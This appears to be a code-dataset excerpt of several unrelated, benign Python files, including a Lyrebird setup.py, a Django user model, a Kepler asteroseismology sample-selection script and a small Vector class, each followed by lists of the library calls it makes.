        opts['norm'] = norm; opts['cmap'] = cmap
    cs = func(x, y, z, **opts)
    return cs
| [
"matplotlib.colors.normalize",
"matplotlib.pyplot.gca",
"matplotlib.pyplot.psd",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.plot",
"scipy.ma.maximum",
"scipy.ma.minimum",
"matplotlib.cm.get_cmap"
] | [((206, 215), 'matplotlib.pyplot.psd', 'pl.psd', (['x'], {}), '(x)\n', (212, 215), True, 'import matplotlib.pyplot as pl\n'), ((217, 225), 'matplotlib.pyplot.clf', 'pl.clf', ([], {}), '()\n', (223, 225), True, 'import matplotlib.pyplot as pl\n'), ((254, 282), 'matplotlib.pyplot.plot', 'pl.plot', (['(T[ind] / 12)', 'P[ind]'], {}), '(T[ind] / 12, P[ind])\n', (261, 282), True, 'import matplotlib.pyplot as pl\n'), ((288, 296), 'matplotlib.pyplot.gca', 'pl.gca', ([], {}), '()\n', (294, 296), True, 'import matplotlib.pyplot as pl\n'), ((888, 904), 'scipy.ma.minimum', 'sp.ma.minimum', (['z'], {}), '(z)\n', (901, 904), True, 'import scipy as sp\n'), ((910, 926), 'scipy.ma.maximum', 'sp.ma.maximum', (['z'], {}), '(z)\n', (923, 926), True, 'import scipy as sp\n'), ((956, 982), 'matplotlib.colors.normalize', 'colors.normalize', (['min', 'max'], {}), '(min, max)\n', (972, 982), False, 'from matplotlib import colors, cm\n'), ((1020, 1033), 'matplotlib.cm.get_cmap', 'cm.get_cmap', ([], {}), '()\n', (1031, 1033), False, 'from matplotlib import colors, cm\n')] |
#!/usr/bin/env python
"""
Lyrebird Voice Changer
Simple and powerful voice changer for Linux, written in GTK 3
(c) Charlotte 2020
"""
import sys
import re
from setuptools import setup
# Pull the version string out of app/__init__.py so it is defined in one
# place only.
version_regex = r'__version__ = ["\']([^"\']*)["\']'

with open('app/__init__.py', 'r') as f:
    text = f.read()
    match = re.search(version_regex, text)

    if match:
        VERSION = match.group(1)
    else:
        raise RuntimeError("No version number found!")

# Runtime dependencies come straight from requirements.txt (comments skipped).
with open("requirements.txt") as f:
    required = [l for l in f.read().splitlines() if not l.startswith("#")]

# Package metadata passed to setuptools.setup below.
extra_options = dict(
    name = 'Lyrebird',
    version=VERSION,
    author = 'Charlotte',
    # author_email = '',
    url = 'https://github.com/charpointer/lyrebird',
    description = 'Simple and powerful voice changer for Linux, written in GTK 3',
    download_url = 'https://github.com/charpointer/lyrebird/releases',
    license = 'MIT License',
    install_requires=required,
    entry_points = {
        'console_scripts': [
            'lyrebird = app.__main__:main']},
    packages = ['app',
                'app.core'],
)
setup(**extra_options)
| [
"setuptools.setup",
"re.search"
] | [((1102, 1124), 'setuptools.setup', 'setup', ([], {}), '(**extra_options)\n', (1107, 1124), False, 'from setuptools import setup\n'), ((311, 341), 're.search', 're.search', (['version_regex', 'text'], {}), '(version_regex, text)\n', (320, 341), False, 'import re\n')] |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from helusers.models import AbstractUser
class User(AbstractUser):
is_official = models.BooleanField(verbose_name=_("official"), default=False)
class Meta:
verbose_name = _("user")
verbose_name_plural = _("users")
ordering = ("id",)
def can_view_contract_zone_details(user):
return user.is_authenticated and user.is_official
| [
"django.utils.translation.ugettext_lazy"
] | [((275, 284), 'django.utils.translation.ugettext_lazy', '_', (['"""user"""'], {}), "('user')\n", (276, 284), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((315, 325), 'django.utils.translation.ugettext_lazy', '_', (['"""users"""'], {}), "('users')\n", (316, 325), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((205, 218), 'django.utils.translation.ugettext_lazy', '_', (['"""official"""'], {}), "('official')\n", (206, 218), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import glob,os,csv,re,math
import shutil, time
from astropy.io import ascii
import matplotlib.pyplot as plt
# Load all data files:
psdir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/'
hrdir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/'
# Original directories:
pande_dir='/Users/maryumsayeed/Desktop/pande/pande_lcs/'
ast_dir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/data/large_train_sample/'
# Directories when testing sections of lightcurves:
# pande_dir='/Users/maryumsayeed/Desktop/pande/pande_lcs_third/'
# ast_dir ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/data/large_train_sample_third/'
pande_lcs =glob.glob(pande_dir+'*.fits')
ast_lcs =glob.glob(ast_dir+'*.fits')
print('# of Pande .ps files:',len(glob.glob(pande_dir+'*.ps')))
print('# of Pande .fits files:',len(glob.glob(pande_dir+'*.fits')))
print('# of Astero. .ps files:',len(glob.glob(ast_dir+'*.ps')))
print('# of Astero. .fits files:',len(glob.glob(ast_dir+'*.fits')))
# Load Berger+ stellar properties catalogues:
gaia =ascii.read('/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt',delimiter='&')
gaia =gaia[gaia['binaryFlag']==0] #remove any binaries
kepler_catalogue=pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv')#,skiprows=1,delimiter=',',usecols=[0,1])
# Get Kps for all stars:
kpfile ='/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/KIC_Kepmag_Berger2018.csv'
kp_all =pd.read_csv(kpfile,usecols=['KIC','kic_kepmag'])
# # Load Asteroseismic Samples:
# Don't want to include any Mathur sample:
mathur_header=['KIC','loggi','e_loggi','r_loggi','n_loggi','logg','E_logg','e_logg','Mass','E_Mass','e_Mass']
mathur_2017 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt',delimiter=';',skiprows=54,names=mathur_header)
mathur_2017 =mathur_2017[mathur_2017['n_loggi']=='AST'] #include only asteroseismic measurements
yu_header=['KICID','Teff','err','logg','logg_err','Fe/H','err','M_noCorrection','M_nocorr_err','R_noCorrection','err','M_RGB','M_RGB_err','R_RGB','err','M_Clump','M_Clump_err','R_Clump','err','EvoPhase']
yu_2018 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt',delimiter='|',names=yu_header,skiprows=1,index_col=False)#,names=yu_header)
#chaplin_2014=pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/Chaplin_2014.txt',skiprows=47,delimiter='\t',names=chaplin_header)
#huber_2013 =pd.read_csv('/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/Huber_2013.txt',delimiter='\t',skiprows=37,names=['KIC','Mass','Mass_err'])
mathur_kics=np.array(mathur_2017['KIC'])
yu_kics=np.array(yu_2018['KICID'])
#chaplin_kics=np.array(chaplin_2014['KIC'])
#huber_kics=np.array(huber_2013['KIC'])
print('# of stars in Yu+2018:',len(yu_kics))
print('# of stars in Mathur+17:',len(mathur_kics))
astero_kics=np.concatenate([mathur_kics,yu_kics])
astero_kics=np.array(list(set(astero_kics)))
print('Total seismic stars:',len(astero_kics))
# # Load Pande sample:
pande =pd.read_csv('/Users/maryumsayeed/Desktop/pande/pande_granulation.txt')#,skiprows=1,usecols=[0],dtype=int,delimiter=',')
pande_kics=list(pande['#KIC'])
print('# of stars in Pande+2018:',len(pande))
# If star in both sample, treat it as asteroseismic star to increase ast. sample.
# If star only in Pande sample, keep it there.
# If star only in ast. sample, keep it there.
pande_stars0=(set(pande_kics) - set(astero_kics))
print('# stars only in Pande+ and not astero',len(pande_stars0))
print('# total astero. stars:',len(astero_kics))
print('# stars in both Pande+ and astero catalogues:',len(list(set(pande_kics) & set(astero_kics))))
# # Get catalogues of non-granulation stars:
not_dir='/Users/maryumsayeed/Desktop/HuberNess/mlearning/ACFcannon-master/not_granulation_star/'
dscutis =np.loadtxt(not_dir+'murphy_dscuti.txt',usecols=[0,-1],delimiter=',',skiprows=1,dtype=int)
idx=np.where(dscutis[:,1]==1)[0] #stars that have dSct flag
dscutis =dscutis[idx][:,0]
binaries =np.loadtxt(not_dir+'ebinary.txt',usecols=[0],dtype=int,delimiter=',')
exoplanets =pd.read_csv(not_dir+'koi_planethosts.csv',skiprows=53,usecols=['kepid','koi_disposition','koi_pdisposition'])
#exoplanets=exoplanets[exoplanets['koi_pdisposition']!='FALSE POSITIVE'] # Remove false positive exoplanets:
exoplanets =[int(i) for i in list(exoplanets['kepid'])]
superflares=np.loadtxt(hrdir+'superflares_shibayama2013.txt',skiprows=33,usecols=[0],dtype=int)
superflares=[int(i) for i in list(superflares)]
flares =list(np.loadtxt(not_dir+'flares_davenport2016.txt',usecols=[0],skiprows=1,delimiter=',',dtype=int))
rotating =list(np.loadtxt(not_dir+'mcquillan_rotation.txt',usecols=[0],skiprows=1,delimiter=',',dtype=int))
clas =ascii.read(not_dir+'debosscher2011.dat')
gdor =clas[(clas['V1'] == 'GDOR') | (clas['V1'] == 'SPB')]
gdor =[int(i) for i in list(gdor['KIC'])]
dscutis2 =clas[clas['V1'] == 'DSCUT']
dscutis2 =[int(i) for i in list(dscutis2['KIC'])]
rrlyr =pd.read_csv(not_dir+'rrlyr.txt')
rrlyr =[int(i) for i in list(rrlyr['kic'])]
# # Remove non-granulation stars:
pande_stars=list(set(pande_stars0)-set(binaries)-set(exoplanets)-set(flares)-set(rotating) -set(superflares)-set(dscutis)-set(dscutis2)-set(gdor)-set(rrlyr))
astero_stars=list(set(astero_kics)-set(binaries)-set(exoplanets)-set(flares)-set(rotating) -set(superflares)-set(dscutis)-set(dscutis2)-set(gdor)-set(rrlyr))
print('# of non-granulation stars removed from astero sample:',len(astero_kics)-len(astero_stars))
print('# of non-granulation stars removed from pande sample:',len(pande_stars0)-len(pande_stars))
# Only get stars in Gaia catalogue (Berger+2018):
print('(before cross-referenced with Gaia) # of Pande stars:',len(pande_stars))
print('(before cross-referenced with Gaia) # of Astero. stars:',len(astero_stars))
pande_stars = list((set(pande_stars) & set(gaia['KIC'])))
astero_stars = list((set(astero_stars) & set(gaia['KIC'])))
print('final # of Pande stars:',len(pande_stars))
print('final # of asteroseismic stars:',len(astero_stars))
# Check if all Pande stars have a light curve downloaded :
print('\n','===== PANDE =====')
pande_kics_downloaded=[]
for file in pande_lcs:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
pande_kics_downloaded.append(kic)
print('These should be the same:')
print('---Stars downloaded:',len(pande_kics_downloaded))
print('---Stars needed:',len(pande_stars))
if len(pande_kics_downloaded) > len(pande_stars):
print('We have more stars downloaded than we need from Pande+18.')
else:
print("Don't have all the stars that we need. Download more!")
# Only use Pande stars we have downloaded:
#pande_stars = list(set(set(pande_stars)-set(pande_not_downloaded)))
pande_below_dc=ascii.read(psdir+'LLR_gaia/pande_kics_below_duty_cycle.txt',names=['KICID'])
pande_below_89=ascii.read(psdir+'LLR_gaia/pande_kics_below_89_days.txt',names=['KICID'])
pande_below_dc,pande_below_89=pande_below_dc['KICID'],pande_below_89['KICID']
pande_not_downloaded =[]
pande_stars_downloaded=[]
for kic in pande_stars:
if kic in pande_kics_downloaded:
pande_stars_downloaded.append(kic)
else:
pande_not_downloaded.append(kic)
print('Need from Pande+18',len(pande_stars))
print('Downloaded',len(pande_stars_downloaded))
print('Have but removed aka:')
print('---# of Pande stars below 89 days',len(pande_below_89))
print('---# of Pande stars below duty cycle',len(pande_below_dc))
print('Pande not downloaded',len(pande_not_downloaded))
print('Good pande stars',len(pande_stars))
# Check if all astero. stars have a light curve downloaded :
print('\n','===== ASTERO. =====')
ast_kics_downloaded=[]
for file in ast_lcs:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
ast_kics_downloaded.append(kic)
print('These should be the same:')
print('---Stars downloaded:',len(ast_kics_downloaded))
print('---Stars needed:',len(astero_stars))
if len(ast_kics_downloaded) > len(astero_stars):
print('We have more stars downloaded than we need from astero catalogues.')
else:
print("Don't have all the stars that we need. Download more!")
astero_below_dc=ascii.read(psdir+'LLR_seismic/astero_kics_below_duty_cycle.txt',names=['KICID'])
astero_below_89=ascii.read(psdir+'LLR_seismic/astero_kics_below_89_days.txt',names=['KICID'])
astero_below_dc,astero_below_89=astero_below_dc['KICID'],astero_below_89['KICID']
astero_not_downloaded =[]
astero_stars_downloaded=[]
for kic in astero_stars:
if kic in ast_kics_downloaded:
astero_stars_downloaded.append(kic)
else:
astero_not_downloaded.append(kic)
print('Need from catalogues',len(astero_stars))
print('Downloaded',len(ast_kics_downloaded))
print('Have but removed aka:')
print('---# of astero stars below 89 days',len(astero_below_89))
print('---# of astero stars below duty cycle',len(astero_below_dc))
print('Astero not downloaded',len(astero_not_downloaded))
print('Good astero stars',len(astero_stars))
# In[13]:
# ascii.write([astero_stars],psdir+'astero_stars_we_need.txt',overwrite=True)
# ascii.write([ast_kics_downloaded],psdir+'astero_stars_downloaded.txt',overwrite=True)
# ascii.write([good_astero_stars],psdir+'good_stars_downloaded.txt',overwrite=True)
fn='/Users/maryumsayeed/Downloads/'
# np.savetxt(fn+'pande_not_downloaded.txt',pande_not_downloaded,fmt='%s')
# np.savetxt(fn+'astero_not_downloaded.txt',astero_not_downloaded,fmt='%s')
# # Find logg for Pande:
print('\n','Getting logg for Pande. stars...')
pande_ps=glob.glob(pande_dir+'*.ps')
pande_no_logg=0
pande_final_sample=[]
pande_loggs=[]
check_dups=[]
for file in pande_ps:
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic in pande_stars:
row=kepler_catalogue.loc[kepler_catalogue['KIC']==kic]
logg=row['iso_logg'].item()
if math.isnan(logg) is False: # check to see there are no nan loggs
logg_pos_err=row['iso_logg_err1']
logg_neg_err=row['iso_logg_err2']
pande_final_sample.append([file,logg])
pande_loggs.append(logg)
else:
pande_no_logg+=1
else:
continue
print('Pande w/ no logg:',pande_no_logg)
# Double check all these stars are in Pande:
kic_not_in_pande=[]
for i in pande_final_sample:
file=i[0]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic not in pande_kics:
kic_not_in_pande.append(kic)
print('# stars not in Pande.',len(kic_not_in_pande))
print('# Pande stars to save:',len(pande_final_sample))
diff=2000
# np.savetxt(psdir+'pande_final_sample_full.txt',pande_final_sample,fmt='%s')
# np.savetxt(psdir+'pande_pickle_1.txt',pande_final_sample[0:2000],fmt='%s')
# np.savetxt(psdir+'pande_pickle_2.txt',pande_final_sample[2000:4000],fmt='%s')
# np.savetxt(psdir+'pande_pickle_3.txt',pande_final_sample[4000:],fmt='%s')
# # Find logg for Astero. stars:
print('\n','Getting logg for Astero. stars...')
astero_ps=glob.glob(ast_dir+'*.ps')
files,loggs=[],np.zeros(len(astero_ps))
c1,c2,c3,none=0,0,0,0
for i in range(0,len(astero_ps)):
file=astero_ps[i]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic in astero_stars:
if kic in yu_kics:
row=yu_2018.loc[yu_2018['KICID']==kic]
logg =row['logg'].item()
c1+=1
elif kic in mathur_kics:
row =mathur_2017.loc[mathur_2017['KIC']==kic]
logg =row['loggi'].item()
c2+=1
else:
none+=1
loggs[i]=logg
files.append(file)
# astero_final_sample.append([file,logg])
# astero_loggs.append(logg)
else:
continue
files,loggs=np.array(files),np.array(loggs).astype(float)
print('Yu+:',c1,'Mathur+',c2,'None',none)
idx=np.where(loggs>0)[0] #aka select valid stars
astero_files,astero_loggs=files[idx],loggs[idx]
astero_final_sample=np.array([astero_files,astero_loggs]).T
# Double check all these stars are in Pande:
kic_not_in_astero=[]
for i in astero_final_sample:
file=i[0]
kic=re.search('kplr(.*)-', file).group(1)
kic=int(kic.lstrip('0'))
if kic not in astero_stars:
kic_not_in_astero.append(kic)
print('# stars not in Astero.',len(kic_not_in_astero))
print('# Astero. stars to save:',len(astero_final_sample))
diff=4000
# np.savetxt(psdir+'astero_final_sample_full.txt',astero_final_sample,fmt='%s')
# np.savetxt(psdir+'astero_final_sample_1.txt',astero_final_sample[0:4000],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_2.txt',astero_final_sample[4000:4000+diff],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_3.txt',astero_final_sample[8000:8000+diff],fmt='%s')
# np.savetxt(psdir+'astero_final_sample_4.txt',astero_final_sample[12000:12000+diff],fmt='%s')
| [
"pandas.read_csv",
"numpy.where",
"math.isnan",
"numpy.array",
"numpy.concatenate",
"numpy.loadtxt",
"astropy.io.ascii.read",
"glob.glob",
"re.search"
] | [((790, 821), 'glob.glob', 'glob.glob', (["(pande_dir + '*.fits')"], {}), "(pande_dir + '*.fits')\n", (799, 821), False, 'import glob, os, csv, re, math\n'), ((835, 864), 'glob.glob', 'glob.glob', (["(ast_dir + '*.fits')"], {}), "(ast_dir + '*.fits')\n", (844, 864), False, 'import glob, os, csv, re, math\n'), ((1184, 1301), 'astropy.io.ascii.read', 'ascii.read', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt"""'], {'delimiter': '"""&"""'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/powerspectrum/DR2PapTable1.txt'\n , delimiter='&')\n", (1194, 1301), False, 'from astropy.io import ascii\n'), ((1368, 1470), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv"""'], {}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/GKSPC_InOut_V4.csv'\n )\n", (1379, 1470), True, 'import pandas as pd\n'), ((1635, 1685), 'pandas.read_csv', 'pd.read_csv', (['kpfile'], {'usecols': "['KIC', 'kic_kepmag']"}), "(kpfile, usecols=['KIC', 'kic_kepmag'])\n", (1646, 1685), True, 'import pandas as pd\n'), ((1885, 2033), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt"""'], {'delimiter': '""";"""', 'skiprows': '(54)', 'names': 'mathur_header'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/mathur_2017.txt'\n , delimiter=';', skiprows=54, names=mathur_header)\n", (1896, 2033), True, 'import pandas as pd\n'), ((2336, 2489), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt"""'], {'delimiter': '"""|"""', 'names': 'yu_header', 'skiprows': '(1)', 'index_col': '(False)'}), "(\n '/Users/maryumsayeed/Desktop/HuberNess/mlearning/hrdmachine/rg_yu.txt',\n delimiter='|', names=yu_header, skiprows=1, index_col=False)\n", (2347, 2489), True, 'import pandas as pd\n'), ((2823, 2851), 'numpy.array', 'np.array', (["mathur_2017['KIC']"], 
{}), "(mathur_2017['KIC'])\n", (2831, 2851), True, 'import numpy as np\n'), ((2860, 2886), 'numpy.array', 'np.array', (["yu_2018['KICID']"], {}), "(yu_2018['KICID'])\n", (2868, 2886), True, 'import numpy as np\n'), ((3080, 3118), 'numpy.concatenate', 'np.concatenate', (['[mathur_kics, yu_kics]'], {}), '([mathur_kics, yu_kics])\n', (3094, 3118), True, 'import numpy as np\n'), ((3246, 3316), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/maryumsayeed/Desktop/pande/pande_granulation.txt"""'], {}), "('/Users/maryumsayeed/Desktop/pande/pande_granulation.txt')\n", (3257, 3316), True, 'import pandas as pd\n'), ((4044, 4144), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'murphy_dscuti.txt')"], {'usecols': '[0, -1]', 'delimiter': '""","""', 'skiprows': '(1)', 'dtype': 'int'}), "(not_dir + 'murphy_dscuti.txt', usecols=[0, -1], delimiter=',',\n skiprows=1, dtype=int)\n", (4054, 4144), True, 'import numpy as np\n'), ((4236, 4310), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'ebinary.txt')"], {'usecols': '[0]', 'dtype': 'int', 'delimiter': '""","""'}), "(not_dir + 'ebinary.txt', usecols=[0], dtype=int, delimiter=',')\n", (4246, 4310), True, 'import numpy as np\n'), ((4318, 4437), 'pandas.read_csv', 'pd.read_csv', (["(not_dir + 'koi_planethosts.csv')"], {'skiprows': '(53)', 'usecols': "['kepid', 'koi_disposition', 'koi_pdisposition']"}), "(not_dir + 'koi_planethosts.csv', skiprows=53, usecols=['kepid',\n 'koi_disposition', 'koi_pdisposition'])\n", (4329, 4437), True, 'import pandas as pd\n'), ((4606, 4699), 'numpy.loadtxt', 'np.loadtxt', (["(hrdir + 'superflares_shibayama2013.txt')"], {'skiprows': '(33)', 'usecols': '[0]', 'dtype': 'int'}), "(hrdir + 'superflares_shibayama2013.txt', skiprows=33, usecols=[0\n ], dtype=int)\n", (4616, 4699), True, 'import numpy as np\n'), ((4972, 5014), 'astropy.io.ascii.read', 'ascii.read', (["(not_dir + 'debosscher2011.dat')"], {}), "(not_dir + 'debosscher2011.dat')\n", (4982, 5014), False, 'from astropy.io import ascii\n'), ((5230, 5264), 
'pandas.read_csv', 'pd.read_csv', (["(not_dir + 'rrlyr.txt')"], {}), "(not_dir + 'rrlyr.txt')\n", (5241, 5264), True, 'import pandas as pd\n'), ((7017, 7096), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_gaia/pande_kics_below_duty_cycle.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_gaia/pande_kics_below_duty_cycle.txt', names=['KICID'])\n", (7027, 7096), False, 'from astropy.io import ascii\n'), ((7109, 7185), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_gaia/pande_kics_below_89_days.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_gaia/pande_kics_below_89_days.txt', names=['KICID'])\n", (7119, 7185), False, 'from astropy.io import ascii\n'), ((8424, 8512), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_seismic/astero_kics_below_duty_cycle.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_seismic/astero_kics_below_duty_cycle.txt', names=[\n 'KICID'])\n", (8434, 8512), False, 'from astropy.io import ascii\n'), ((8521, 8606), 'astropy.io.ascii.read', 'ascii.read', (["(psdir + 'LLR_seismic/astero_kics_below_89_days.txt')"], {'names': "['KICID']"}), "(psdir + 'LLR_seismic/astero_kics_below_89_days.txt', names=['KICID']\n )\n", (8531, 8606), False, 'from astropy.io import ascii\n'), ((9784, 9813), 'glob.glob', 'glob.glob', (["(pande_dir + '*.ps')"], {}), "(pande_dir + '*.ps')\n", (9793, 9813), False, 'import glob, os, csv, re, math\n'), ((11142, 11169), 'glob.glob', 'glob.glob', (["(ast_dir + '*.ps')"], {}), "(ast_dir + '*.ps')\n", (11151, 11169), False, 'import glob, os, csv, re, math\n'), ((4138, 4166), 'numpy.where', 'np.where', (['(dscutis[:, 1] == 1)'], {}), '(dscutis[:, 1] == 1)\n', (4146, 4166), True, 'import numpy as np\n'), ((4755, 4858), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'flares_davenport2016.txt')"], {'usecols': '[0]', 'skiprows': '(1)', 'delimiter': '""","""', 'dtype': 'int'}), "(not_dir + 'flares_davenport2016.txt', usecols=[0], skiprows=1,\n delimiter=',', dtype=int)\n", (4765, 4858), True, 'import numpy as 
np\n'), ((4867, 4968), 'numpy.loadtxt', 'np.loadtxt', (["(not_dir + 'mcquillan_rotation.txt')"], {'usecols': '[0]', 'skiprows': '(1)', 'delimiter': '""","""', 'dtype': 'int'}), "(not_dir + 'mcquillan_rotation.txt', usecols=[0], skiprows=1,\n delimiter=',', dtype=int)\n", (4877, 4968), True, 'import numpy as np\n'), ((11880, 11895), 'numpy.array', 'np.array', (['files'], {}), '(files)\n', (11888, 11895), True, 'import numpy as np\n'), ((11973, 11992), 'numpy.where', 'np.where', (['(loggs > 0)'], {}), '(loggs > 0)\n', (11981, 11992), True, 'import numpy as np\n'), ((12086, 12124), 'numpy.array', 'np.array', (['[astero_files, astero_loggs]'], {}), '([astero_files, astero_loggs])\n', (12094, 12124), True, 'import numpy as np\n'), ((897, 926), 'glob.glob', 'glob.glob', (["(pande_dir + '*.ps')"], {}), "(pande_dir + '*.ps')\n", (906, 926), False, 'import glob, os, csv, re, math\n'), ((963, 994), 'glob.glob', 'glob.glob', (["(pande_dir + '*.fits')"], {}), "(pande_dir + '*.fits')\n", (972, 994), False, 'import glob, os, csv, re, math\n'), ((1031, 1058), 'glob.glob', 'glob.glob', (["(ast_dir + '*.ps')"], {}), "(ast_dir + '*.ps')\n", (1040, 1058), False, 'import glob, os, csv, re, math\n'), ((1097, 1126), 'glob.glob', 'glob.glob', (["(ast_dir + '*.fits')"], {}), "(ast_dir + '*.fits')\n", (1106, 1126), False, 'import glob, os, csv, re, math\n'), ((6466, 6494), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (6475, 6494), False, 'import glob, os, csv, re, math\n'), ((7979, 8007), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (7988, 8007), False, 'import glob, os, csv, re, math\n'), ((9906, 9934), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (9915, 9934), False, 'import glob, os, csv, re, math\n'), ((10086, 10102), 'math.isnan', 'math.isnan', (['logg'], {}), '(logg)\n', (10096, 10102), False, 'import glob, os, csv, re, math\n'), ((10496, 10524), 're.search', 
're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (10505, 10524), False, 'import glob, os, csv, re, math\n'), ((11294, 11322), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (11303, 11322), False, 'import glob, os, csv, re, math\n'), ((11896, 11911), 'numpy.array', 'np.array', (['loggs'], {}), '(loggs)\n', (11904, 11911), True, 'import numpy as np\n'), ((12246, 12274), 're.search', 're.search', (['"""kplr(.*)-"""', 'file'], {}), "('kplr(.*)-', file)\n", (12255, 12274), False, 'import glob, os, csv, re, math\n')] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/TechLaProvence/lp_mongodb
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 figarocms <EMAIL>
from tornado.concurrent import return_future
from lp_mongodb.storages.mongo_storage import Storage
from thumbor.context import Context
from thumbor.config import Config
@return_future
def load(context, path, callback):
storage = Storage(context)
callback(storage.get(path)) | [
"lp_mongodb.storages.mongo_storage.Storage"
] | [((473, 489), 'lp_mongodb.storages.mongo_storage.Storage', 'Storage', (['context'], {}), '(context)\n', (480, 489), False, 'from lp_mongodb.storages.mongo_storage import Storage\n')] |
import numpy as np
from tabulate import tabulate
import matplotlib.pyplot as plt
import Page_Rank_Utils as pru
def detectedConverged(y,x,epsilon):
C = set()
N = set()
for i in range(len(y)):
if abs(y[i] - x[i])/abs(x[i]) < epsilon:
C.add(i)
else:
N.add(i)
return N, C
def filter(A_prime, x_prime, N, C):
n = N.shape[0]
for i in range(n):
if i in C:
x_prime[i] = 0
for j in range(n):
A_prime[i][j] = 0
return A_prime, x_prime
def Filter_APR(G, weight, period):
P = pru.stochastic_transition_matrix(G, weight, True)
n = P.shape[0]
# initialize eigenvectors
v_list = []
idx = 0
v_init = np.zeros(n)
v_init[-1] = 1
v_list.append(v_init)
converged = True
while not converged:
return
| [
"Page_Rank_Utils.stochastic_transition_matrix",
"numpy.zeros"
] | [((591, 640), 'Page_Rank_Utils.stochastic_transition_matrix', 'pru.stochastic_transition_matrix', (['G', 'weight', '(True)'], {}), '(G, weight, True)\n', (623, 640), True, 'import Page_Rank_Utils as pru\n'), ((733, 744), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (741, 744), True, 'import numpy as np\n')] |
from troyka_led_matrix import TroykaLedMatrix
from urandom import getrandbits
import time
matrix = TroykaLedMatrix()
while True:
matrix.draw_pixel(getrandbits(3), getrandbits(3))
matrix.clear_pixel(getrandbits(3), getrandbits(3))
time.sleep_ms(50)
| [
"time.sleep_ms",
"urandom.getrandbits",
"troyka_led_matrix.TroykaLedMatrix"
] | [((104, 121), 'troyka_led_matrix.TroykaLedMatrix', 'TroykaLedMatrix', ([], {}), '()\n', (119, 121), False, 'from troyka_led_matrix import TroykaLedMatrix\n'), ((253, 270), 'time.sleep_ms', 'time.sleep_ms', (['(50)'], {}), '(50)\n', (266, 270), False, 'import time\n'), ((160, 174), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (171, 174), False, 'from urandom import getrandbits\n'), ((176, 190), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (187, 190), False, 'from urandom import getrandbits\n'), ((216, 230), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (227, 230), False, 'from urandom import getrandbits\n'), ((232, 246), 'urandom.getrandbits', 'getrandbits', (['(3)'], {}), '(3)\n', (243, 246), False, 'from urandom import getrandbits\n')] |
import math
import itertools
class Vector:
"""
Generic vector operations.
"""
def _apply(self,op, other):
pairwise = None
if type(other) is Vector:
pairwise = zip(self.vals, other.vals)
else:
pairwise = zip(self.vals, [other for _ in self.vals])
return Vector(*itertools.starmap(op, pairwise))
def __init__(self, *args):
self.vals = args
def __add__(self, other):
return self._apply(lambda a, b: a + b, other)
def __sub__(self, other):
return self._apply(lambda a, b: a - b, other)
def __mul__(self, other):
return self._apply(lambda a, b: a*b, other)
def __div__(self, other):
return self._apply(lambda a, b: a / b, other)
def length(self):
total = sum(map(lambda a: math.pow(a, 2), self.vals))
return math.sqrt(total)
